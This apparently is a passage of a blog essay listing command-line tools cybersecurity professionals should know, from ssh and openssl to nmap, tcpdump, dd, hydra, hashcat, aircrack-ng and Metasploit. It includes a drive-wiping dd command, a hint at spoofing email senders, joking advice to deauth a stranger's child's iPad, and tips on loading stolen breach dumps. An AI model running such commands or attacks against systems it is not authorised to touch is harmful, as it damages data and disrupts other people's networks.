In general, you’ll remotely log into a system in order to use the command-line. We use ‘ssh’ for that. It uses a protocol similar to SSL in order to encrypt the connection. There are two ways to use ‘ssh’ to login, with a password or with a client-side certificate.

When using SSH with a password, you type “ssh [email protected]”. The remote system will then prompt you for a password for that account.

When using client-side certificates, use “ssh-keygen” to generate a key, then either copy the public-key of the client to the server manually, or use “ssh-copy-id” to copy it using the password method above.

How this works is basic application of public-key cryptography. When logging in with a password, you get a copy of the server’s public-key the first time you login, and if it ever changes, you get a nasty warning that somebody may be attempting a man in the middle attack.

$ ssh [email protected]
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@    WARNING: REMOTE HOST IDENTIFICATION HAS CHANGED!     @
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
IT IS POSSIBLE THAT SOMEONE IS DOING SOMETHING NASTY!

When using client-side certificates, the server trusts your public-key. This is similar to how client-side certificates work in SSL VPNs.

You can use SSH for things other than loging into a remote shell. You can script ‘ssh’ to run commands remotely on a system in a local shell script. You can use ‘scp’ (SSH copy) to transfer files to and from a remote system. You can do tricks with SSH to create tunnels, which is popular way to bypass the restrictive rules of your local firewall nazi.

openssl

This is your general cryptography toolkit, doing everything from simple encryption, to public-key certificate signing, to establishing SSL connections.

It is extraordinarily user hostile, with terrible inconsistency among options. You can only figure out how to do things by looking up examples on the net, such as on StackExchange. There are competing SSL libraries with their own command-line tools, like GnuTLS and Mozilla NSS that you might find easier to use.

The fundamental use of the ‘openssl’ tool is to create public-keys, “certificate requests”, and creating self-signed certificates. All the web-site certificates I’ve ever obtained has been using the openssl command-line tool to create CSRs.

You should practice using the ‘openssl’ tool to encrypt files, sign files, and to check signatures.

You can use openssl just like PGP for encrypted emails/messages, but following the “S/MIME” standard rather than PGP standard. You might consider learning the ‘pgp’ command-line tools, or the open-source ‘gpg’ or ‘gpg2’ tools as well.

You should learn how to use the “openssl s_client” feature to establish SSL connections, as well as the “openssl s_server” feature to create an SSL proxy for a server that doesn’t otherwise support SSL.

Learning all the ways of using the ‘openssl’ tool to do useful things will go a long way in teaching somebody about crypto and cybersecurity. I can imagine an entire class consisting of nothing but learning ‘openssl’.

netcat (nc, socat, cyptocat, ncat)

A lot of Internet protocols are based on text. That means you can create a raw TCP connection to the service and interact with them using your keyboard. The classic tool for doing this is known as “netcat”, abbreviated “nc”. For example, connect to Google’s web server at port and type the HTTP HEAD command followed by a blank line (hit [return] twice):

$ nc www.google.com 80
HEAD / HTTP/1.0

HTTP/1.0 200 OK
Date: Tue, 17 Jan 2017 01:53:28 GMT
Expires: -1
Cache-Control: private, max-age=0
Content-Type: text/html; charset=ISO-8859-1
P3P: CP=”This is not a P3P policy! See https://www.google.com/support/accounts/answer/151657?hl=en for more info.”
Server: gws
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Set-Cookie: NID=95=o7GT1uJCWTPhaPAefs4CcqF7h7Yd7HEqPdAJncZfWfDSnNfliWuSj3XfS5GJXGt67-QJ9nc8xFsydZKufBHLj-K242C3_Vak9Uz1TmtZwT-1zVVBhP8limZI55uXHuPrejAxyTxSCgR6MQ; expires=Wed, 19-Jul-2017 01:53:28 GMT; path=/; domain=.google.com; HttpOnly
Accept-Ranges: none
Vary: Accept-Encoding

Another classic example is to connect to port 25 on a mail server to send email, spoofing the “MAIL FROM” address.

There are several versions of ‘netcat’ that work over SSL as well. My favorite is ‘ncat’, which comes with ‘nmap’, as it’s actively maintained. In theory, “openssl s_client” should also work this way.

nmap

At some point, you’ll need to port scan. The standard program for this is ‘nmap’, and it’s the best. The classic way of using it is something like:

# nmap –A scanme.nmap.org

The ‘-A’ option means to enable all the interesting features like OS detection, version detection, and basic scripts on the most common ports that a server might have open. It takes awhile to run. The “scanme.nmap.org” is a good site to practice on.

Nmap is more than just a port scanner. It has a rich scripting system for probing more deeply into a system than just a port, and to gather more information useful for attacks. The scripting system essentially contains some attacks, such as password guessing.

Scanning the Internet, finding services identified by ‘nmap’ scripts, and interacting with them with tools like ‘ncat’ will teach you a lot about how the Internet works.

BTW, if ‘nmap’ is too slow, using ‘masscan’ instead. It’s a lot faster, though has much more limited functionality.

Packet sniffing with tcpdump and tshark

All Internet traffic consists of packets going between IP addresses. You can capture those packets and view them using “packet sniffers”. The most important packet-sniffer is “Wireshark”, a GUI. For the command-line, there is ‘tcpdump’ and ‘tshark’.

You can run tcpdump on the command-line to watch packets go in/out of the local computer. This performs a quick “decode” of packets as they are captured. It’ll reverse-lookup IP addresses into DNS names, which means its buffers can overflow, dropping new packets while it’s waiting for DNS name responses for previous packets (which can be disabled with -n):

# tcpdump –p –i eth0

A common task is to create a round-robin set of files, saving the last 100 files of 1-gig each. Older files are overwritten. Thus, when an attack happens, you can stop capture, and go backward in times and view the contents of the network traffic using something like Wireshark:

# tcpdump –p -i eth0 -s65535 –C 1000 –W 100 –w cap

Instead of capturing everything, you’ll often set “BPF” filters to narrow down to traffic from a specific target, or a specific port.

The above examples use the –p option to capture traffic destined to the local computer. Sometimes you may want to look at all traffic going to other machines on the local network. You’ll need to figure out how to tap into wires, or setup “monitor” ports on switches for this to work.

A more advanced command-line program is ‘tshark’. It can apply much more complex filters. It can also be used to extract the values of specific fields and dump them to a text files.

Base64/hexdump/xxd/od

These are some rather trivial commands, but you should know them.

The ‘base64’ command encodes binary data in text. The text can then be passed around, such as in email messages. Base64 encoding is often automatic in the output from programs like openssl and PGP.

In many cases, you’ll need to view a hex dump of some binary data. There are many programs to do this, such as hexdump, xxd, od, and more.

grep

Grep searches for a pattern within a file. More important, it searches for a regular expression (regex) in a file. The fu of Unix is that a lot of stuff is stored in text files, and use grep for regex patterns in order to extra stuff stored in those files.

The power of this tool really depends on your mastery of regexes. You should master enough that you can understand StackExhange posts that explain almost what you want to do, and then tweek them to make them work.

Grep, by default, shows only the matching lines. In many cases, you only want the part that matches. To do that, use the –o option. (This is not available on all versions of grep).

You’ll probably want the better, “extended” regular expressions, so use the –E option.

You’ll often want “case-insensitive” options (matching both upper and lower case), so use the –i option.

For example, to extract all MAC address from a text file, you might do something like the following. This extracts all strings that are twelve hex digits.

$ grep –Eio ‘[0-9A-F]{12}’ foo.txt

Text processing

Grep is just the first of the various “text processing filters”. Other useful ones include ‘sed’, ‘cut’, ‘sort’, and ‘uniq’.

You’ll be an expert as piping output of one to the input of the next. You’ll use “sort | uniq” as god (Dennis Ritchie) intended and not the heresy of “sort –u”.

You might want to master ‘awk’. It’s a new programming language, but once you master it, it’ll be easier than other mechanisms.

You’ll end up using ‘wc’ (word-count) a lot. All it does is count the number of lines, words, characters in a file, but you’ll find yourself wanting to do this a lot.

csvkit and jq

You get data in CSV format and JSON format a lot. The tools ‘csvkit’ and ‘jq’ respectively help you deal with those tools, to convert these files into other formats, sticking the data in databases, and so forth.

It’ll be easier using these tools that understand these text formats to extract data than trying to write ‘awk’ command or ‘grep’ regexes.

strings

Most files are binary with a few readable ASCII strings. You use the program ‘strings’ to extract those strings.

This one simple trick sounds stupid, but it’s more powerful than you’d think. For example, I knew that a program probably contained a hard-coded password. I then blindly grabbed all the strings in the program’s binary file and sent them to a password cracker to see if they could decrypt something. And indeed, one of the 100,000 strings in the file worked, thus finding the hard-coded password.

tail -f

So ‘tail’ is just a standard Linux tool for looking at the end of files. If you want to keep checking the end of a live file that’s constantly growing, then use “tail –f”. It’ll sit there waiting for something new to be added to the end of the file, then print it out. I do this a lot, so I thought it’d be worth mentioning.

tar –xvfz, gzip, xz, 7z

In prehistorical times (like the 1980s), Unix was backed up to tape drives. The tar command could be used to combine a bunch of files into a single “archive” to be sent to the tape drive, hence “tape archive” or “tar”.

These days, a lot of stuff you download will be in tar format (ending in .tar). You’ll need to learn how to extract it:

$ tar –xvf something.tar

Nobody knows what the “xvf” options mean anymore, but these letters most be specified in that order. I’m joking here, but only a little: somebody did a survey once and found that virtually nobody know how to use ‘tar’ other than the canned formulas such as this.

Along with combining files into an archive you also need to compress them. In prehistoric Unix, the “compress” command would be used, which would replace a file with a compressed version ending in ‘.z’. This would found to be encumbered with patents, so everyone switched to ‘gzip’ instead, which replaces a file with a new one ending with ‘.gz’.

$ ls foo.txt*
foo.txt
$ gzip foo.txt
$ ls foo.txt*
foo.txt.gz

Combined with tar, you get files with either the “.tar.gz” extension, or simply “.tgz”. You can untar and uncompress at the same time:

$ tar –xvfz something .tar.gz

Gzip is always good enough, but nerds gonna nerd and want to compress with slightly better compression programs. They’ll have extensions like “.bz2”, “.7z”, “.xz”, and so on. There are a ton of them. Some of them are supported directly by the ‘tar’ program:

$ tar –xvfj something.tar.bz2

Then there is the “zip/unzip” program, which supports Windows .zip file format. To create compressed archives these days, I don’t bother with tar, but just use the ZIP format. For example, this will recursively descend a directory, adding all files to a ZIP file that can easily be extracted under Windows:

$ zip –r test.zip ./test/

dd

I should include this under the system tools at the top, but it’s interesting for a number of purposes. The usage is simply to copy one file to another, the in-file to the out-file.

$ dd if=foo.txt of=foo2.txt

But that’s not interesting. What interesting is using it to write to “devices”. The disk drives in your system also exist as raw devices under the /dev directory.

For example, if you want to create a boot USB drive for your Raspberry Pi:

# dd if=rpi-ubuntu.img of=/dev/sdb

Or, you might want to hard erase an entire hard drive by overwriting random data:

# dd if=/dev/urandom of=/dev/sdc

Or, you might want to image a drive on the system, for later forensics, without stumbling on things like open files.

# dd if=/dev/sda of=/media/Lexar/infected.img

The ‘dd’ program has some additional options, like block size and so forth, that you’ll want to pay attention to.

screen and tmux

You log in remotely and start some long running tool. Unfortunately, if you log out, all the processes you started will be killed. If you want it to keep running, then you need a tool to do this.

I use ‘screen’. Before I start a long running port scan, I run the “screen” command. Then, I type [ctrl-a][ctrl-d] to disconnect from that screen, leaving it running in the background.

Then later, I type “screen –r” to reconnect to it. If there are more than one screen sessions, using ‘-r’ by itself will list them all. Use “-r pid” to reattach to the proper one. If you can’t, then use “-D pid” or “-D –RR pid” to forced the other session to detached from whoever is using it.

Tmux is an alternative to screen that many use. It’s cool for also having lots of terminal screens open at once.

curl and wget

Sometimes you want to download files from websites without opening a browser. The ‘curl’ and ‘wget’ programs do that easily. Wget is the traditional way of doing this, but curl is a bit more flexible. I use curl for everything these days, except mirroring a website, in which case I just do “wget –m website”.

The thing that makes ‘curl’ so powerful is that it’s really designed as a tool for poking and prodding all the various features of HTTP. That it’s also useful for downloading files is a happy coincidence. When playing with a target website, curl will allow you do lots of complex things, which you can then script via bash. For example, hackers often write their cross-site scripting/forgeries in bash scripts using curl.

node/php/python/perl/ruby/lua

As mentioned above, bash is its own programming language. But it’s weird, and annoying. So sometimes you want a real programming language. Here are some useful ones.

Yes, PHP is a language that runs in a web server for creating web pages. But if you know the language well, it’s also a fine command-line language for doing stuff.

Yes, JavaScript is a language that runs in the web browser. But if you know it well, it’s also a great language for doing stuff, especially with the “nodejs” version.

Then there are other good command line languages, like the Python, Ruby, Lua, and the venerable Perl.

What makes all these great is the large library support. Somebody has already written a library that nearly does what you want that can be made to work with a little bit of extra code of your own.

My general impression is that Python and NodeJS have the largest libraries likely to have what you want, but you should pick whichever language you like best, whichever makes you most productive. For me, that’s NodeJS, because of the great Visual Code IDE/debugger.

iptables, iptables-save

I shouldn’t include this in the list. Iptables isn’t a command-line tool as such. The tool is the built-in firewalling/NAT features within the Linux kernel. Iptables is just the command to configure it.

Firewalling is an important part of cybersecurity. Everyone should have some experience playing with a Linux system doing basic firewalling tasks: basic rules, NATting, and transparent proxying for mitm attacks.

Use ‘iptables-save’ in order to persistently save your changes.

MySQL

Similar to ‘iptables’, ‘mysql’ isn’t a tool in its own right, but a way of accessing a database maintained by another process on the system.

Filters acting on text files only goes so far. Sometimes you need to dump it into a database, and make queries on that database.

There is also the offensive skill needed to learn how targets store things in a database, and how attackers get the data.

Hackers often publish raw SQL data they’ve stolen in their hacks (like the Ashley-Madisan dump). Being able to stick those dumps into your own database is quite useful. Hint: disable transaction logging while importing mass data.

If you don’t like SQL, you might consider NoSQL tools like Elasticsearch, MongoDB, and Redis that can similarly be useful for arranging and searching data. You’ll probably have to learn some JSON tools for formatting the data.

Reverse engineering tools

A cybersecurity specialty is “reverse engineering”. Some want to reverse engineer the target software being hacked, to understand vulnerabilities. This is needed for commercial software and device firmware where the source code is hidden. Others use these tools to analyze viruses/malware.

The ‘file’ command uses heuristics to discover the type of a file.

There’s a whole skillset for analyzing PDF and Microsoft Office documents. I play with pdf-parser. There’s a long list at this website:
https://zeltser.com/analyzing-malicious-documents/

There’s a whole skillset for analyzing executables. Binwalk is especially useful for analyzing firmware images.

Qemu is useful is a useful virtual-machine. It can emulate full systems, such as an IoT device based on the MIPS processor. Like some other tools mentioned here, it’s more a full subsystem than a simple command-line tool.

On a live system, you can use ‘strace’ to view what system calls a process is making. Use ‘lsof’ to view which files and network connections a process is making.

Password crackers

A common cybersecurity specialty is “password cracking”. There’s two kinds: online and offline password crackers.

Typical online password crackers are ‘hydra’ and ‘medusa’. They can take files containing common passwords and attempt to log on to various protocols remotely, like HTTP, SMB, FTP, Telnet, and so on. I used ‘hydra’ recently in order to find the default/backdoor passwords to many IoT devices I’ve bought recently in my test lab.

Online password crackers must open TCP connections to the target, and try to logon. This limits their speed. They also may be stymied by systems that lock accounts, or introduce delays, after too many bad password attempts.

Typical offline password crackers are ‘hashcat’ and ‘jtr’ (John the Ripper). They work off of stolen encrypted passwords. They can attempt billions of passwords-per-second, because there’s no network interaction, nothing slowing them down.

Understanding offline password crackers means getting an appreciation for the exponential difficulty of the problem. A sufficiently long and complex encrypted password is uncrackable. Instead of brute-force attempts at all possible combinations, we must use tricks, like mutating the top million most common passwords.

I use hashcat because of the great GPU support, but John is also a great program.

WiFi hacking

A common specialty in cybersecurity is WiFi hacking. The difficulty in WiFi hacking is getting the right WiFi hardware that supports the features (monitor mode, packet injection), then the right drivers installed in your operating system. That’s why I use Kali rather than some generic Linux distribution, because it’s got the right drivers installed.

The ‘aircrack-ng’ suite is the best for doing basic hacking, such as packet injection. When the parents are letting the iPad babysit their kid with a loud movie at the otherwise quite coffeeshop, use ‘aircrack-ng’ to deauth the kid.

The ‘reaver’ tool is useful for hacking into sites that leave WPS wide open and misconfigured.

Remote exploitation

A common specialty in cybersecurity is pentesting.

Nmap, curl, and netcat (described above) above are useful tools for this.

Some useful DNS tools are ‘dig’ (described above), dnsrecon/dnsenum/fierce that try to enumerate and guess as many names as possible within a domain. These tools all have unique features, but also have a lot of overlap.

Nikto is a basic tool for probing for common vulnerabilities, out-of-date software, and so on. It’s not really a vulnerability scanner like Nessus used by defenders, but more of a tool for attack.

SQLmap is a popular tool for probing for SQL injection weaknesses.

Then there is ‘msfconsole’. It has some attack features. This is humor – it has all the attack features. Metasploit is the most popular tool for running remote attacks against targets, exploiting vulnerabilities.

Text editor

Finally, there is the decision of text editor. I use ‘vi’ variants. Others like ‘nano’ and variants. There’s no wrong answer as to which editor to use, unless that answer is ‘emacs’.

Conclusion

Obviously, not every cybersecurity professional will be familiar with every tool in this list. If you don’t do reverse-engineering, then you won’t use reverse-engineering tools.

On the other hand, regardless of your specialty, you need to know basic crypto concepts, so you should know something like the ‘openssl’ tool. You need to know basic networking, so things like ‘nmap’ and ‘tcpdump’. You need to be comfortable processing large dumps of data, manipulating it with any tool available. You shouldn’t be frightened by a little sysadmin work.

The above list is therefore a useful starting point for cybersecurity professionals. Of course, those new to the industry won’t have much familiarity with them. But it’s fair to say that I’ve used everything listed above at least once in the last year, and the year before that, and the year before that. I spend a lot of time on StackExchange and Google searching the exact options I need, so I’m not an expert, but I am familiar with the basic use of all these things.